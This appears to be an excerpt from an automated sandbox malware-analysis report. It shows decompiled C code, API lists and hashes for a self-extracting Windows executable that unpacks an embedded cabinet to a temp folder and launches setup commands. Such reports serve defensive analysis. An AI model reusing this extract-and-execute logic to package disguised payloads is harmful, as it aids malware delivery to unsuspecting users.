                                                                        									_push(0);
                                                                        									_push(0x10);
                                                                        									_push(0);
                                                                        									L35:
                                                                        									_push(_t60);
                                                                        									E00A344B9(0, _t140);
                                                                        									_t62 = 0;
                                                                        									goto L54;
                                                                        								} else {
                                                                        									_t155 = _v1556;
                                                                        									_t92 = _t155;
                                                                        									if( *_t155 == 0) {
                                                                        										_t92 = "DefaultInstall";
                                                                        									}
                                                                        									 *0xa39120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                        									 *_v1560 = 1;
                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa31140, _t156, 8,  &_v268) == 0) {
                                                                        										 *0xa39a34 =  *0xa39a34 & 0xfffffffb;
                                                                        										if( *0xa39a40 != 0) {
                                                                        											_t108 = "setupapi.dll";
                                                                        										} else {
                                                                        											_t108 = "setupx.dll";
                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                        										}
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										_push( &_v268);
                                                                        										_push(_t155);
                                                                        										E00A3171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                        									} else {
                                                                        										 *0xa39a34 =  *0xa39a34 | 0x00000004;
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										E00A31680(_t108, 0x104, _t155);
                                                                        										_t140 = 0x200;
                                                                        										E00A31680(_t156, 0x200,  &_v268);
                                                                        									}
                                                                        									L53:
                                                                        									_t62 = 1;
                                                                        									 *_v1564 = _t156;
                                                                        									L54:
                                                                        									_pop(_t152);
                                                                        									return E00A36CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A31BE7
                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A31BFE
                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00A31C57
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00A31C88
                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A31140,00000000,00000008,?), ref: 00A31CB8
                                                                        • GetShortPathNameA.KERNEL32 ref: 00A31D1B
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                        • API String ID: 383838535-1533028066
                                                                        • Opcode ID: 74b123c53d7a68f3ea2ea1d8c4d01c2e1f5bee783d4d0db6057b9c51816e52c9
                                                                        • Instruction ID: 4adf835f85f721e7c3c08a9aa6fc85c30c60ad213ded753e0ea0836d42b2daf4
                                                                        • Opcode Fuzzy Hash: 74b123c53d7a68f3ea2ea1d8c4d01c2e1f5bee783d4d0db6057b9c51816e52c9
                                                                        • Instruction Fuzzy Hash: B5A149B0A003186BEB20DF24CC45FFA77A9EB56350F1447A9F595A32D1DBB09E86CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 a3597d-a359b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a359bb-a359d8 call a344b9 call a36285 324->325 326 a359dd-a35a1b GetDiskFreeSpaceA 324->326 343 a35c05-a35c14 call a36ce0 325->343 328 a35ba1-a35bde memset call a36285 GetLastError FormatMessageA 326->328 329 a35a21-a35a4a MulDiv 326->329 339 a35be3-a35bfc call a344b9 SetCurrentDirectoryA 328->339 329->328 332 a35a50-a35a6c GetVolumeInformationA 329->332 335 a35ab5-a35aca SetCurrentDirectoryA 332->335 336 a35a6e-a35ab0 memset call a36285 GetLastError FormatMessageA 332->336 337 a35acc-a35ad1 335->337 336->339 341 a35ad3-a35ad8 337->341 342 a35ae2-a35ae4 337->342 351 a35c02 339->351 341->342 346 a35ada-a35ae0 341->346 348 a35ae7-a35af8 342->348 349 a35ae6 342->349 346->337 346->342 353 a35af9-a35afb 348->353 349->348 354 a35c04 351->354 355 a35b05-a35b08 353->355 356 a35afd-a35b03 353->356 354->343 357 a35b20-a35b27 355->357 358 a35b0a-a35b1b call a344b9 355->358 356->353 356->355 360 a35b52-a35b5b 357->360 361 a35b29-a35b33 357->361 358->351 362 a35b62-a35b6d 360->362 361->360 364 a35b35-a35b50 361->364 365 a35b76-a35b7d 362->365 366 a35b6f-a35b74 362->366 364->362 368 a35b83 365->368 369 a35b7f-a35b81 365->369 367 a35b85 366->367 370 a35b87-a35b94 call a3268b 367->370 371 a35b96-a35b9f 367->371 368->367 369->367 370->354 371->354
                                                                        C-Code - Quality: 96%
                                                                        			E00A3597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				char _v788;
                                                                        				long _v792;
                                                                        				long _v796;
                                                                        				long _v800;
                                                                        				signed int _v804;
                                                                        				long _v808;
                                                                        				int _v812;
                                                                        				long _v816;
                                                                        				long _v820;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t46;
                                                                        				int _t50;
                                                                        				signed int _t55;
                                                                        				void* _t66;
                                                                        				int _t69;
                                                                        				signed int _t73;
                                                                        				signed short _t78;
                                                                        				signed int _t87;
                                                                        				signed int _t101;
                                                                        				int _t102;
                                                                        				unsigned int _t103;
                                                                        				unsigned int _t105;
                                                                        				signed int _t111;
                                                                        				long _t112;
                                                                        				signed int _t116;
                                                                        				CHAR* _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        
                                                                        				_t114 = __edi;
                                                                        				_t46 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t46 ^ _t120;
                                                                        				_v804 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                        				if(_t50 != 0) {
                                                                        					_push(__edi);
                                                                        					_v796 = 0;
                                                                        					_v792 = 0;
                                                                        					_v800 = 0;
                                                                        					_v808 = 0;
                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                        					__eflags = _t55;
                                                                        					if(_t55 == 0) {
                                                                        						L29:
                                                                        						memset( &_v788, 0, 0x200);
                                                                        						 *0xa39124 = E00A36285();
                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        						_t110 = 0x4b0;
                                                                        						L30:
                                                                        						__eflags = 0;
                                                                        						E00A344B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                        						SetCurrentDirectoryA( &_v276);
                                                                        						L31:
                                                                        						_t66 = 0;
                                                                        						__eflags = 0;
                                                                        						L32:
                                                                        						_pop(_t114);
                                                                        						goto L33;
                                                                        					}
                                                                        					_t69 = _v792 * _v796;
                                                                        					_v812 = _t69;
                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                        					__eflags = _t116;
                                                                        					if(_t116 == 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                        					__eflags = _t73;
                                                                        					if(_t73 != 0) {
                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                        						_t101 =  &_v16;
                                                                        						_t111 = 6;
                                                                        						_t119 = _t118 - _t101;
                                                                        						__eflags = _t119;
                                                                        						while(1) {
                                                                        							_t22 = _t111 - 4; // 0x2
                                                                        							__eflags = _t22;
                                                                        							if(_t22 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                        							__eflags = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *_t101 = _t87;
                                                                        							_t101 = _t101 + 1;
                                                                        							_t111 = _t111 - 1;
                                                                        							__eflags = _t111;
                                                                        							if(_t111 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t111;
                                                                        						if(_t111 == 0) {
                                                                        							_t101 = _t101 - 1;
                                                                        							__eflags = _t101;
                                                                        						}
                                                                        						 *_t101 = 0;
                                                                        						_t112 = 0x200;
                                                                        						_t102 = _v812;
                                                                        						_t78 = 0;
                                                                        						_t118 = 8;
                                                                        						while(1) {
                                                                        							__eflags = _t102 - _t112;
                                                                        							if(_t102 == _t112) {
                                                                        								break;
                                                                        							}
                                                                        							_t112 = _t112 + _t112;
                                                                        							_t78 = _t78 + 1;
                                                                        							__eflags = _t78 - _t118;
                                                                        							if(_t78 < _t118) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t78 - _t118;
                                                                        						if(_t78 != _t118) {
                                                                        							__eflags =  *0xa39a34 & 0x00000008;
                                                                        							if(( *0xa39a34 & 0x00000008) == 0) {
                                                                        								L20:
                                                                        								_t103 =  *0xa39a38; // 0x0
                                                                        								_t110 =  *((intOrPtr*)(0xa389e0 + (_t78 & 0x0000ffff) * 4));
                                                                        								L21:
                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                        									__eflags = _v804 & 0x00000001;
                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                        										__eflags = _t103 - _t116;
                                                                        									} else {
                                                                        										__eflags = _t110 - _t116;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                        								}
                                                                        								if(__eflags <= 0) {
                                                                        									 *0xa39124 = 0;
                                                                        									_t66 = 1;
                                                                        								} else {
                                                                        									_t66 = E00A3268B(_a4, _t110, _t103,  &_v16);
                                                                        								}
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _v816 & 0x00008000;
                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t105 =  *0xa39a38; // 0x0
                                                                        							_t110 =  *((intOrPtr*)(0xa389e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa389e0 + (_t78 & 0x0000ffff) * 4));
                                                                        							_t103 = (_t105 >> 2) +  *0xa39a38;
                                                                        							goto L21;
                                                                        						}
                                                                        						_t110 = 0x4c5;
                                                                        						E00A344B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                        						goto L31;
                                                                        					}
                                                                        					memset( &_v788, 0, 0x200);
                                                                        					 *0xa39124 = E00A36285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        					_t110 = 0x4f9;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t110 = 0x4bc;
                                                                        					E00A344B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                        					 *0xa39124 = E00A36285();
                                                                        					_t66 = 0;
                                                                        					L33:
                                                                        					return E00A36CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A359A8
                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A359AF
                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A35A13
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00A35A40
                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A35A64
                                                                        • memset.MSVCRT ref: 00A35A7C
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A35A98
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A35AA5
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A35BFC
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                        • String ID:
                                                                        • API String ID: 4237285672-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 77%
                                                                        			E00A34FE0(void* __edi, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t10;
                                                                        				void* _t12;
                                                                        				struct HWND__* _t24;
                                                                        				struct HWND__* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t33;
                                                                        				int _t34;
                                                                        				CHAR* _t36;
                                                                        				int _t37;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t36 = "CABINET";
                                                                        				 *0xa39144 = E00A3468F(_t36, 0, 0);
                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                        				 *0xa39140 = _t8;
                                                                        				if(_t8 == 0) {
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 =  *0xa38584; // 0x0
                                                                        				if(_t9 != 0) {
                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                        					ShowWindow(GetDlgItem( *0xa38584, 0x841), 5);
                                                                        				}
                                                                        				_t10 = E00A34EFD(0, 0);
                                                                        				if(_t10 != 0) {
                                                                        					__imp__#20(E00A34CA0, E00A34CC0, E00A34980, E00A34A50, E00A34AD0, E00A34B60, E00A34BC0, 1, 0xa39148, _t33);
                                                                        					_t34 = _t10;
                                                                        					if(_t34 == 0) {
                                                                        						L8:
                                                                        						_t29 =  *0xa39148; // 0x0
                                                                        						_t24 =  *0xa38584; // 0x0
                                                                        						E00A344B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                        						_t37 = 0;
                                                                        						L9:
                                                                        						goto L10;
                                                                        					}
                                                                        					__imp__#22(_t34, "*MEMCAB", 0xa31140, 0, E00A34CD0, 0, 0xa39140); // executed
                                                                        					_t37 = _t10;
                                                                        					if(_t37 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					__imp__#23(_t34); // executed
                                                                        					if(_t10 != 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					_t27 =  *0xa38584; // 0x0
                                                                        					E00A344B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                        					_t37 = 0;
                                                                        					L10:
                                                                        					_t12 =  *0xa39140; // 0x0
                                                                        					if(_t12 != 0) {
                                                                        						FreeResource(_t12);
                                                                        						 *0xa39140 = 0;
                                                                        					}
                                                                        					if(_t37 == 0) {
                                                                        						_t47 =  *0xa391d8; // 0x0
                                                                        						if(_t47 == 0) {
                                                                        							E00A344B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                        						}
                                                                        					}
                                                                        					if(( *0xa38a38 & 0x00000001) == 0 && ( *0xa39a34 & 0x00000001) == 0) {
                                                                        						SendMessageA( *0xa38584, 0xfa1, _t37, 0);
                                                                        					}
                                                                        					return _t37;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A34FFE
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00A35006
                                                                        • LockResource.KERNEL32(00000000), ref: 00A3500D
                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00A35030
                                                                        • ShowWindow.USER32(00000000), ref: 00A35037
                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00A3504A
                                                                        • ShowWindow.USER32(00000000), ref: 00A35051
                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A35111
                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A35159
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                        • String ID: *MEMCAB$CABINET
                                                                        • API String ID: 1305606123-2642027498
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 82%
                                                                        			E00A32F1D(void* __ecx, int __edx) {
                                                                        				signed int _v8;
                                                                        				char _v272;
                                                                        				_Unknown_base(*)()* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				void* _t14;
                                                                        				int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				_Unknown_base(*)()* _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed int _t46;
                                                                        				int _t47;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_t9 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t9 ^ _t46;
                                                                        				if( *0xa38a38 != 0) {
                                                                        					L5:
                                                                        					_t11 = E00A35164(_t52);
                                                                        					_t53 = _t11;
                                                                        					if(_t11 == 0) {
                                                                        						L16:
                                                                        						_t12 = 0;
                                                                        						L17:
                                                                        						return E00A36CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                        					}
                                                                        					_t14 = E00A355A0(_t53); // executed
                                                                        					if(_t14 == 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t45 = 0x105;
                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                        						_t43 = 0x105;
                                                                        						_t40 =  &_v272;
                                                                        						E00A3658A( &_v272, 0x105, "advapi32.dll");
                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                        						_t44 = 0;
                                                                        						if(_t36 != 0) {
                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                        							_v276 = _t31;
                                                                        							if(_t31 != 0) {
                                                                        								_t45 = _t47;
                                                                        								_t40 = _t31;
                                                                        								 *0xa3a288("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                        								_v276();
                                                                        								if(_t47 != _t47) {
                                                                        									_t40 = 4;
                                                                        									asm("int 0x29");
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						FreeLibrary(_t36);
                                                                        						_t58 =  *0xa38a24 - _t44; // 0x0
                                                                        						if(_t58 != 0) {
                                                                        							L14:
                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                        							if(_t21 != 0) {
                                                                        								__eflags =  *0xa38a2c - _t44; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									L20:
                                                                        									__eflags =  *0xa38d48 & 0x000000c0;
                                                                        									if(( *0xa38d48 & 0x000000c0) == 0) {
                                                                        										_t41 =  *0xa39a40; // 0x3, executed
                                                                        										_t26 = E00A3256D(_t41); // executed
                                                                        										_t44 = _t26;
                                                                        									}
                                                                        									_t22 =  *0xa38a24; // 0x0
                                                                        									 *0xa39a44 = _t44;
                                                                        									__eflags = _t22;
                                                                        									if(_t22 != 0) {
                                                                        										L26:
                                                                        										__eflags =  *0xa38a38;
                                                                        										if( *0xa38a38 == 0) {
                                                                        											__eflags = _t22;
                                                                        											if(__eflags == 0) {
                                                                        												E00A34169(__eflags);
                                                                        											}
                                                                        										}
                                                                        										_t12 = 1;
                                                                        										goto L17;
                                                                        									} else {
                                                                        										__eflags =  *0xa39a30 - _t22; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										_t25 = E00A33BA2(); // executed
                                                                        										__eflags = _t25;
                                                                        										if(_t25 == 0) {
                                                                        											goto L16;
                                                                        										}
                                                                        										_t22 =  *0xa38a24; // 0x0
                                                                        										goto L26;
                                                                        									}
                                                                        								}
                                                                        								_t27 = E00A33B26(_t40, _t44);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L20;
                                                                        							}
                                                                        							_t43 = 0x4bc;
                                                                        							E00A344B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                        							 *0xa39124 = E00A36285();
                                                                        							goto L16;
                                                                        						}
                                                                        						_t59 =  *0xa39a30 - _t44; // 0x0
                                                                        						if(_t59 != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t30 = E00A3621E(); // executed
                                                                        						if(_t30 == 0) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t49 =  *0xa38a24;
                                                                        				if( *0xa38a24 != 0) {
                                                                        					L4:
                                                                        					_t34 = E00A33A3F(_t51);
                                                                        					_t52 = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				if(E00A351E5(_t49) == 0) {
                                                                        					goto L16;
                                                                        				}
                                                                        				_t51 =  *0xa38a38;
                                                                        				if( *0xa38a38 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L4;
                                                                        			}





























                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A32F93
                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A32FB2
                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A32FC6
                                                                        • DecryptFileA.ADVAPI32 ref: 00A32FE6
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A32FF8
                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A3301C
                                                                          • Part of subcall function 00A351E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A32F4D,?,00000002,00000000), ref: 00A35201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                        • API String ID: 2126469477-3095882572
                                                                        • Opcode ID: 070f65c39bbadc041cd7734d50ebfb84130ed0d7b52a411d2f347de5982dd798
                                                                        • Instruction ID: 89121751d843bc3a697096bf4f974c66a87783918bcae11190ade0b5ad6550e2
                                                                        • Opcode Fuzzy Hash: 070f65c39bbadc041cd7734d50ebfb84130ed0d7b52a411d2f347de5982dd798
                                                                        • Instruction Fuzzy Hash: 33419632E04315ABDF38EBB5ED4676773A8AB56790F010165F941C2191EF78CE82CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 a35467-a35484 479 a3548a-a35490 call a353a1 478->479 480 a3551c-a35528 call a31680 478->480 483 a35495-a35497 479->483 484 a3552d-a35539 call a358c8 480->484 485 a35581-a35583 483->485 486 a3549d-a354c0 call a31781 483->486 493 a3553b-a35545 CreateDirectoryA 484->493 494 a3554d-a35552 484->494 488 a3558d-a3559d call a36ce0 485->488 495 a354c2-a354d8 GetSystemInfo 486->495 496 a3550c-a3551a call a3658a 486->496 498 a35577-a3557c call a36285 493->498 499 a35547 493->499 500 a35585-a3558b 494->500 501 a35554-a35557 call a3597d 494->501 504 a354da-a354dd 495->504 505 a354fe 495->505 496->484 498->485 499->494 500->488 512 a3555c-a3555e 501->512 510 a354f7-a354fc 504->510 511 a354df-a354e2 504->511 507 a35503-a35507 call a3658a 505->507 507->496 510->507 515 a354f0-a354f5 511->515 516 a354e4-a354e7 511->516 512->500 513 a35560-a35566 512->513 513->485 517 a35568-a35575 RemoveDirectoryA 513->517 515->507 516->496 518 a354e9-a354ee 516->518 517->485 518->507
                                                                        C-Code - Quality: 75%
                                                                        			E00A35467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _SYSTEM_INFO _v304;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t10;
                                                                        				void* _t13;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				signed int _t26;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				CHAR* _t48;
                                                                        				signed int _t49;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t10 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t10 ^ _t49;
                                                                        				_push(__ecx);
                                                                        				if(__edx == 0) {
                                                                        					_t48 = 0xa391e4;
                                                                        					_t42 = 0x104;
                                                                        					E00A31680(0xa391e4, 0x104);
                                                                        					L14:
                                                                        					_t13 = E00A358C8(_t48); // executed
